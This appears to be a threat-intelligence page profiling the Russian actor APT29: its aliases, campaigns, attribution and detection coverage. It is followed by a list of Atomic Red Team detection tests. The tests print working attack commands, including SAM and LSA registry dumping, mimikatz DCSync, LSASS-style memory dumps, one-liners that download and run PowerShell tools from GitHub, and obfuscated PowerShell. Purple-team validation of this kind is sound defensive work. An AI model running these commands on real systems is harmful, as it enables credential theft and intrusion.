apt29_cozybear · threatengine.sh

Home/Threat Actor/APT29

Threat Actor

APT29

apt29_cozybear · russia · active since 2008

APT29 (SVR / Cozy Bear / Midnight Blizzard / NOBELIUM / The Dukes) is a Russian Foreign Intelligence Service cyber-espionage actor active since 2008, attributed by US/UK governments to the SVR, responsible for the 2015 DNC intrusion, the 2019-2021 SolarWinds software supply-chain compromise, sustained COVID-19 vaccine research targeting, the 2024 Midnight Blizzard compromise of Microsoft corporate, and continuing identity-and-cloud-focused operations against NATO governments, defense, technology, and managed-service-provider targets.

russia confidence: high 35 aliases MITRE ATT&CK G0118 ↗

Sigma rules5 YARA rules144 Live IOCs1,662 CVEs exploited7

⬢

Profile

APT29 is a Russian state-sponsored cyber-espionage actor attributed to the SVR (Foreign Intelligence Service of the Russian Federation). Active since at least 2008, it is one of the two most prominent Russian threat actors alongside APT28.

the two have repeatedly targeted the same victims independently. APT29 is the better tradecraft and operates with patience, focusing on long-dwell collection rather than the broader, noisier operations of APT28. The group is best known for the 2015 DNC intrusion, the 2019-2021 SolarWinds supply-chain compromise (one of the most consequential cyber operations in history, affecting US Treasury, DOJ, DHS, State, Commerce, Microsoft, FireEye/Mandiant, and thousands of others), sustained COVID-19 vaccine research targeting in 2020, and the January 2024 compromise of Microsoft corporate (Midnight Blizzard). APT29's tradecraft has shifted heavily toward identity-and cloud-centric attack surfaces: SAML token forgery (golden-token attacks), OAuth application abuse, service principal manipulation, AD FS modification (MagicWeb), residential-proxy obfuscation, password spraying against dormant accounts, MFA-fatigue, and device-code authentication phishing. The malware toolkit ranges from the early Duke-family implants (MiniDuke, CozyDuke, SeaDuke, HAMMERTOSS) through the SolarWinds-era weapons (SUNBURST, SUNSPOT, TEARDROP, Raindrop, Sibot, GoldFinder, GoldMax) to the recent NOBELIUM toolkit (EnvyScout, BoomBox, VaporRage, MagicWeb, FoggyWeb).

☉

Aliases

apt29cozy bearcozybearcozydukethe dukesmidnight blizzardnobeliumunc2452unc3524dark halosolarstormstellarparticleyttriumiron ritualiron hemlocknoblebaronblue kitsunebluebravocloaked ursacloudlookcraneflyfritillarygrizzly steppegroup 100itg11minidionisseaduketa421uac-0029apt-c-42atk 7blue dev 5g0016apt 29apt-29

⌖

Notable Campaigns

2024Midnight Blizzard Compromise of Microsoft Corporate (Jan 2024)
2024Joint Advisory AA24-057A, SVR Cyber Actors Adapt Tactics for Initial Cloud Access
2024Device Code Authentication Phishing
2023JetBrains TeamCity Exploitation (CVE-2023-42793)
2021NOBELIUM Sustained Targeting (Post-SolarWinds)
2020COVID-19 Vaccine Research Targeting
2019-2021SolarWinds Compromise (C0024 / Solorigate / Sunburst)
2015DNC Compromise (Summer 2015)
2013-2019Operation Ghost (C0023)

★

Attribution & Reporting

Attributed by

White HouseUS Department of StateCISANSAFBIUS Department of JusticeUK NCSCUK GovernmentMicrosoftMandiantFireEyeCrowdStrikeVolexityF-SecureESETSymantecPWCKasperskySecureworksPalo Alto Networks Unit 42SentinelOneIBM X-ForceTalosCERT-FRGoogle TAG

Key reporting

reportF-Secure: The Dukes, 7 Years of Russian Cyberespionage (September 2015)

reportFireEye: APT29, HAMMERTOSS, Stealthy Tactics Define a Russian Cyber Threat Group (July 2015)

reportCrowdStrike: Bears in the Midst, Intrusion into the Democratic National Committee (June 2016)

reportESET: Operation Ghost, The Dukes Aren't Back, They Never Left (October 2019)

reportNCSC UK / NSA / CSE: Advisory, APT29 Targets COVID-19 Vaccine Development (July 2020)

reportVolexity: Dark Halo Leverages SolarWinds Compromise to Breach Organizations (December 2020)

reportFireEye / Mandiant: Highly Evasive Attacker Leverages SolarWinds Supply Chain Compromises with SUNBURST Backdoor (December 2020)

reportCrowdStrike: SUNSPOT, An Implant in the Build Process (January 2021)

reportMicrosoft: Deep Dive into the Solorigate Second-Stage Activation (January 2021)

reportMicrosoft / FireEye / CrowdStrike: GoldMax, GoldFinder, Sibot, Analyzing NOBELIUM Malware (March 2021)

reportWhite House Fact Sheet: Imposing Costs for Harmful Foreign Activities by the Russian Government (April 2021)

reportNSA / CISA / FBI / NCSC: SVR Cyber Actors Targeting US and Allied Networks (April 2021)

reportNCSC UK: Further TTPs Associated with SVR Cyber Actors (May 2021)

reportMicrosoft: Breaking Down NOBELIUM's Latest Early-Stage Toolset (May 2021)

reportMandiant: APT29 Continues Targeting Microsoft (February 2024)

reportMandiant: UNC3524, Eye Spy on Your Email (May 2022)

reportMicrosoft: MagicWeb, NOBELIUM's Post-Compromise Trick to Authenticate as Anyone (August 2022)

reportCISA AA24-057A: SVR Cyber Actors Adapt Tactics for Initial Cloud Access (February 2024)

reportFBI IC3 Industry Alert 240226, SVR Initial Access Methods (February 2024)

reportMicrosoft: Midnight Blizzard, Guidance for Responders on Nation-State Attack (January 2024)

reportBlackpoint: Threat Profile, APT29 (June 2024)

reportEuRepoC: APT Profile, APT 29 (February 2023)

reportCERT-FR CTI-011: Russian Intelligence Service Threat (2021)

reportPWC: WellMess Malware, Analysis and Command Control

57 source links

https://attack.mitre.org/groups/G0016/

https://attack.mitre.org/campaigns/C0023

https://attack.mitre.org/campaigns/C0024

https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/

https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services

https://www.gov.uk/government/news/russia-uk-exposes-russian-involvement-in-solarwinds-cyber-compromise

https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF

https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise

https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf

https://www.ncsc.gov.uk/files/Advisory-further-TTPs-associated-with-SVR-cyber-actors.pdf

https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-057a

https://www.ic3.gov/Media/News/2024/240226.pdf

https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf

https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf

https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf

https://www.welivesecurity.com/wp-content/uploads/2022/02/eset_threat_report_t32021.pdf

https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/

https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/

https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/

https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html

https://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html

https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html

https://www.mandiant.com/resources/blog/unc2452-merged-into-apt29

https://www.mandiant.com/resources/blog/unc3524-eye-spy-email

https://www.mandiant.com/resources/blog/apt29-continues-targeting-microsoft

https://www.mandiant.com/resources/tracking-apt29-phishing-campaigns

https://www.mandiant.com/resources/russian-targeting-gov-business

https://www.mandiant.com/sites/default/files/2022-08/remediation-hardening-strategies-for-m365-defend-against-apt29-white-paper.pdf

https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/

https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/

https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/

https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/

https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/

https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/

https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/

https://www.microsoft.com/security/blog/2022/08/24/magicweb-nobeliums-post-compromise-trick-to-authenticate-as-anyone/

https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/

https://msrc-blog.microsoft.com/2021/02/18/microsoft-internal-solorigate-investigation-final-update/

https://msrc-blog.microsoft.com/2021/06/25/new-nobelium-activity/

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/

https://www.secureworks.com/research/threat-profiles/iron-ritual

http://www.secureworks.com/research/threat-profiles/iron-hemlock

https://www.secureworks.com/blog/usaid-themed-phishing-campaign-leverages-us-elections-lure

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware

http://www.symantec.com/connect/blogs/forkmeiamfamous-seaduke-latest-weapon-duke-armory

https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html

https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html

https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/

https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline/

https://services.google.com/fh/files/misc/rpt-apt29-hammertoss-stealthy-tactics-define-en.pdf

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-011.pdf

https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/

https://www.slideshare.net/slideshow/no-easy-breach-derby-con-2016/66447908

https://malpedia.caad.fkie.fraunhofer.de/actor/apt29

https://blackpointcyber.com/wp-content/uploads/2024/06/Threat-Profile-APT29_Blackpoint-Adversary-Pursuit-Group-APG_2024.pdf

⬡

Operational

State sponsor

SVR (Foreign Intelligence Service of the Russian Federation)

Motivations

espionage, intelligence_gathering, cloud_and_identity_compromise, supply_chain_compromise

Sectors

government diplomatic defense aerospace think_tanks research_institutes higher_education technology telecommunications consulting it_service_providers managed_service_providers cloud_service_providers pharmaceutical covid_19_vaccine_research political_organizations media ngo energy

Regions

north_america europe nato_member_states united_kingdom germany netherlands france nordic_countries eastern_europe asia middle_east australia

◈

Detection Blind Spots

60 techniques

Across this actor’s 60 mapped techniques, the share covered by each detection layer. Low bars are where you’d be blind if this actor targeted you.

Behavioral / log (Sigma)51/60 · 85%

Analytics (MITRE CAR)28/60 · 46%

Runtime / container (Falco)4/60 · 6%

File / malware (YARA)0/60 · 0%

Network (Suricata/Snort)13/60 · 21%

Vuln scan (Nuclei)0/60 · 0%

▸

Atomic Test Plan

30 techniques

Runnable Atomic Red Team tests covering this actor’s mapped techniques - validate your detections against this specific adversary. Cross-reference the blind spots above. For authorized lab / purple-team use. Open the full builder

T1001.002 Steganography · 3 tests

powershellelevatedwindowsSteganographic Tarball Embedding

Get-Content "#{image_file}", "#{tar_file}" -Encoding byte -ReadCount 0 | Set-Content "#{new_image_file}" -Encoding byte

powershellelevatedwindowsEmbedded Script in Image Execution via Extract-Invoke-PSImage

cd "PathToAtomicsFolder\ExternalPayloads\"
Import-Module .\Extract-Invoke-PSImage.ps1
$extractedScript=Extract-Invoke-PSImage -Image "#{image_file}" -Out "$HOME\result.ps1"
$scriptContent = Get-Content "$HOME\result.ps1" -Raw
$base64Pattern = "(?<=^|[^A-Za-z0-9+/])(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}(==)?|[A-Za-z0-9+/]{3}=)?(?=$|[^A-Za-z0-9+/])"
$base64Strings = [regex]::Matches($scriptContent, $base64Pattern) | ForEach-Object { $_.Value }
$base64Strings | Set-Content "$HOME\decoded.ps1"
$decodedContent = Get-Content "$HOME\decoded.ps1" -Raw
$decodedText = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($decodedContent))
$textPattern = '^.+'  
$textMatches = [regex]::Matches($decodedText, $textPattern) | ForEach-Object { $_.Value }
$scriptPath = "$HOME\textExtraction.ps1"
$textMatches -join '' | Set-Content -Path $scriptPath
. "$HOME\textExtraction.ps1"

shlinuxExecute Embedded Script in Image via Steganography

cat "#{script}" | base64 | xxd -p | sed 's/../& /g' | xargs -n1 | xxd -r -p | cat "#{image}" - > "#{evil_image}"; strings "#{evil_image}" | tail -n 1 | base64 -d | sh

T1003 OS Credential Dumping · 7 tests

command_promptelevatedwindowsGsecdump

"#{gsecdump_exe}" -a

powershellelevatedwindowsCredential Dumping with NPPSpy

Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32"
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy -ErrorAction Ignore
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Class" -Value 2 -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Name" -Value NPPSpy -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\NPPSPY.dll" -ErrorAction Ignore
echo "[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\NPPSpy.txt"

powershellelevatedwindowsDump svchost.exe to gather RDP credentials

$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full

powershellelevatedwindowsRetrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)

C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@text:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*

powershellelevatedwindowsRetrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)

C:\Windows\System32\inetsrv\appcmd.exe list apppool /config

powershellwindowsDump Credential Manager using keymgr.dll and rundll32.exe

rundll32.exe keymgr,KRShowKeyMgr

powershellwindowsSend NTLM Hash with RPC Test Connection

rpcping -s #{server_ip} -e #{custom_port} -a privacy -u NTLM 1>$Null

T1003.002 Security Account Manager · 8 tests

command_promptelevatedwindowsRegistry dump of SAM, creds, and secrets

reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security

command_promptelevatedwindowsRegistry parse with pypykatz

"#{venv_path}\Scripts\pypykatz" live lsa

command_promptelevatedwindowsesentutl.exe SAM copy

esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}

powershellelevatedwindowsPowerDump Hashes and Usernames from Registry

Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
Invoke-PowerDump

command_promptwindowsdump volume shadow copy hives with certutil

for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) & dir /B %temp%\#{target_hive}vss*

powershellwindowsdump volume shadow copy hives with System.IO.File

1..#{limit} | % { 
 try { [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$_\Windows\System32\config\#{target_hive}" , "$env:TEMP\#{target_hive}vss$_", "true") } catch {}
 ls "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}

powershellwindowsWinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive

command_promptelevatedwindowsDumping of SAM, creds, and secrets(Reg Export)

reg export HKLM\sam %temp%\sam
reg export HKLM\system %temp%\system
reg export HKLM\security %temp%\security

T1003.004 LSA Secrets · 2 tests

command_promptelevatedwindowsDumping LSA Secrets

"#{psexec_exe}" -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets /y

powershellelevatedwindowsDump Kerberos Tickets from LSA using dumper.ps1

Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/MzHmO/PowershellKerberos/beed52acda37fc531ef0cb4df3fc2eb63a74bbb8/dumper.ps1')

T1003.006 DCSync · 2 tests

command_promptwindowsDCSync (Active Directory)

#{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit"

powershellwindowsRun DSInternals Get-ADReplAccount

Get-ADReplAccount -All -Server #{logonserver}

T1005 Data from Local System · 3 tests

powershellwindowsSearch files of interest and save them to a single zip file (Windows)

$startingDirectory = "#{starting_directory}"
$outputZip = "#{output_zip_folder_path}"
$fileExtensionsString = "#{file_extensions}" 
$fileExtensions = $fileExtensionsString -split ", "

New-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null

Function Search-Files {
  param (
    [string]$directory
  )
  $files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {
    $fileExtensions -contains $_.Extension.ToLower()
  }
  return $files
}

$foundFiles = Search-Files -directory $startingDirectory
if ($foundFiles.Count -gt 0) {
  $foundFilePaths = $foundFiles.FullName
  Compress-Archive -Path $foundFilePaths -DestinationPath "$outputZip\data.zip"

  Write-Host "Zip file created: $outputZip\data.zip"
  } else {
      Write-Host "No files found with the specified extensions."
  }

bashlinuxFind and dump sqlite databases (Linux)

cd $HOME
curl -O #{remote_url}/art
curl -O #{remote_url}/gta.db
curl -O #{remote_url}/sqlite_dump.sh
chmod +x sqlite_dump.sh
find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;

shmacosCopy Apple Notes database files using AppleScript

osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"' -e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile to folder destinationFolderPath with replacing' -e 'end' -e 'end tell'

T1016 System Network Configuration Discovery · 9 tests

command_promptwindowsSystem Network Configuration Discovery on Windows

ipconfig /all
netsh interface show interface
arp -a
nbtstat -n
net config

command_promptwindowsList Windows Firewall Rules

netsh advfirewall firewall show rule name=all

shmacos, linuxSystem Network Configuration Discovery

if [ "$(uname)" = 'FreeBSD' ]; then cmd="netstat -Sp tcp"; else cmd="netstat -ant"; fi;
if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi;
if [ -x "$(command -v ifconfig)" ]; then ifconfig; else echo "ifconfig is missing from the machine. skipping..."; fi;
if [ -x "$(command -v ip)" ]; then ip addr; else echo "ip is missing from the machine. skipping..."; fi;
if [ -x "$(command -v netstat)" ]; then $cmd | awk '{print $NF}' | grep -v '[[:lower:]]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi;

command_promptwindowsSystem Network Configuration Discovery (TrickBot Style)

ipconfig /all
net config workstation
net view /all /domain
nltest /domain_trusts

powershellwindowsList Open Egress Ports

$ports = Get-content "#{port_file}"
$file = "#{output_file}"
$totalopen = 0
$totalports = 0
New-Item $file -Force
foreach ($port in $ports) {
    $test = new-object system.Net.Sockets.TcpClient
    $wait = $test.beginConnect("allports.exposed", $port, $null, $null)
    $wait.asyncwaithandle.waitone(250, $false) | Out-Null
    $totalports++ | Out-Null
    if ($test.Connected) {
        $result = "$port open" 
        Write-Host -ForegroundColor Green $result
        $result | Out-File -Encoding ASCII -append $file
        $totalopen++ | Out-Null
    }
    else {
        $result = "$port closed" 
        Write-Host -ForegroundColor Red $result
        $totalclosed++ | Out-Null
        $result | Out-File -Encoding ASCII -append $file
    }
}
$results = "There were a total of $totalopen open ports out of $totalports ports tested."
$results | Out-File -Encoding ASCII -append $file
Write-Host $results

command_promptwindowsAdfind - Enumerate Active Directory Subnet Objects

"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=subnet) #{optional_args}

command_promptwindowsQakbot Recon

"#{recon_commands}"

bashelevatedmacosList macOS Firewall Rules

sudo defaults read /Library/Preferences/com.apple.alf
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate

command_promptwindowsDNS Server Discovery Using nslookup

nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%USERDNSDOMAIN%

T1016.001 Internet Connection Discovery · 5 tests

command_promptwindowsCheck internet connection using ping Windows

ping -n 4 #{ping_target}

bashmacos, linuxCheck internet connection using ping freebsd, linux or macos

ping -c 4 #{ping_target}

powershellwindowsCheck internet connection using Test-NetConnection in PowerShell (ICMP-Ping)

Test-NetConnection -ComputerName #{target}

powershellwindowsCheck internet connection using Test-NetConnection in PowerShell (TCP-HTTP)

Test-NetConnection -CommonTCPPort HTTP -ComputerName #{target}

powershellwindowsCheck internet connection using Test-NetConnection in PowerShell (TCP-SMB)

Test-NetConnection -CommonTCPPort SMB -ComputerName #{target}

T1018 Remote System Discovery · 22 tests

command_promptwindowsRemote System Discovery - net

net view /domain
net view

command_promptwindowsRemote System Discovery - net group Domain Computers

net group "Domain Computers" /domain

command_promptwindowsRemote System Discovery - nltest

nltest.exe /dclist:#{target_domain}

command_promptwindowsRemote System Discovery - ping sweep

for /l %i in (#{start_host},1,#{stop_host}) do ping -n 1 -w 100 #{subnet}.%i

command_promptwindowsRemote System Discovery - arp

arp -a

shlinux, macosRemote System Discovery - arp nix

arp -a | grep -v '^?'

shlinux, macosRemote System Discovery - sweep

for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done

powershellelevatedwindowsRemote System Discovery - nslookup

$localip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1]
$pieces = $localip.split(".")
$firstOctet = $pieces[0]
$secondOctet = $pieces[1]
$thirdOctet = $pieces[2]
foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.exe /c nslookup $ip}

command_promptelevatedwindowsRemote System Discovery - adidnsdump

"#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass} --print-zones #{host_name}

command_promptwindowsAdfind - Enumerate Active Directory Computer Objects

"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=computer) #{optional_args}

command_promptwindowsAdfind - Enumerate Active Directory Domain Controller Objects

"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -sc dclist

shlinuxRemote System Discovery - ip neighbour

ip neighbour show

shlinuxRemote System Discovery - ip route

ip route show

shlinuxRemote System Discovery - netstat

netstat -r | grep default

shlinuxRemote System Discovery - ip tcp_metrics

ip tcp_metrics show |grep --invert-match "^127\."

powershellwindowsEnumerate domain computers within Active Directory using DirectorySearcher

$DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher("(ObjectCategory=Computer)")
$DirectorySearcher.PropertiesToLoad.Add("Name")
$Computers = $DirectorySearcher.findall()
foreach ($Computer in $Computers) {
  $Computer = $Computer.Properties.name
  if (!$Computer) { Continue }
  Write-Host $Computer}

powershellwindowsEnumerate Active Directory Computers with Get-AdComputer

Get-AdComputer -Filter *

powershellwindowsEnumerate Active Directory Computers with ADSISearcher

([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()

powershellwindowsGet-DomainController with PowerView

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose

powershellwindowsGet-WmiObject to Enumerate Domain Controllers

try { get-wmiobject -class ds_computer -namespace root\directory\ldap -ErrorAction Stop }
catch { $_; exit $_.Exception.HResult }

command_promptwindowsRemote System Discovery - net group Domain Controller

net group /domain "Domain controllers"

powershellwindowsEnumerate Remote Hosts with Netscan

cmd /c '#{netscan_path}' /hide /auto:"$env:temp\T1018NetscanOutput.txt" /range:'#{range_to_scan}'

T1021.001 Remote Desktop Protocol · 4 tests

powershellwindowsRDP to DomainController

$Server=#{logonserver}
$User = Join-Path #{domain} #{username}
$Password="#{password}"
cmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password
mstsc /v:$Server
echo "RDP connection established"

powershellelevatedwindowsChanging RDP Port to Non Standard Port via Powershell

Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "PortNumber" -Value #{NEW_Remote_Port}
New-NetFirewallRule -DisplayName 'RDPPORTLatest-TCP-In' -Profile 'Public' -Direction Inbound -Action Allow -Protocol TCP -LocalPort #{NEW_Remote_Port}

command_promptelevatedwindowsChanging RDP Port to Non Standard Port via Command_Prompt

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{NEW_Remote_Port} /f
netsh advfirewall firewall add rule name="RDPPORTLatest-TCP-In" dir=in action=allow protocol=TCP localport=#{NEW_Remote_Port}

command_promptwindowsDisable NLA for RDP via Command Prompt

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /d 0 /t REG_DWORD /f

T1021.002 SMB/Windows Admin Shares · 4 tests

command_promptwindowsMap admin share

cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"

powershellwindowsMap Admin Share PowerShell

New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}

command_promptelevatedwindowsCopy and Execute File with PsExec

"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}

command_promptelevatedwindowsExecute command writing output to local Admin Share

cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1

T1021.006 Windows Remote Management · 3 tests

powershellelevatedwindowsEnable Windows Remote Management

Enable-PSRemoting -Force

powershellwindowsRemote Code Execution with PS Credentials Using Invoke-Command

Enable-PSRemoting -Force
Invoke-Command -ComputerName $env:COMPUTERNAME -ScriptBlock {whoami}

powershellelevatedwindowsWinRM Access with Evil-WinRM

evil-winrm -i #{destination_address} -u #{user_name} -p #{password}

T1027 Obfuscated Files or Information · 11 tests

shmacos, linuxDecode base64 Data into Script

if [ "$(uname)" = 'FreeBSD' ]; then cmd="b64decode -r"; else cmd="base64 -d"; fi;
cat /tmp/encoded.dat | $cmd > /tmp/art.sh
chmod +x /tmp/art.sh
/tmp/art.sh

powershellwindowsExecute base64-encoded PowerShell

$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand
powershell.exe -EncodedCommand $EncodedCommand

powershellwindowsExecute base64-encoded PowerShell from Windows Registry

$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand

Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))"

command_promptwindowsExecution from Compressed File

"PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\T1027.exe"

powershellwindowsDLP Evasion via Sensitive Data in VBA Macro over email

Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments "#{input_file}" -SmtpServer #{smtp_server}

powershellwindowsDLP Evasion via Sensitive Data in VBA Macro over HTTP

Invoke-WebRequest -Uri #{ip_address} -Method POST -Body "#{input_file}"

powershellwindowsObfuscated Command in PowerShell

$cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING')  ;   $pz2Sb0  =[TYpE]("{1}{0}{2}"-f'nv','cO','ert')  ;  &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') (  (&("{1}{2}{0}"-f'blE','gET-','vaRIA')  ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] (  $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) )

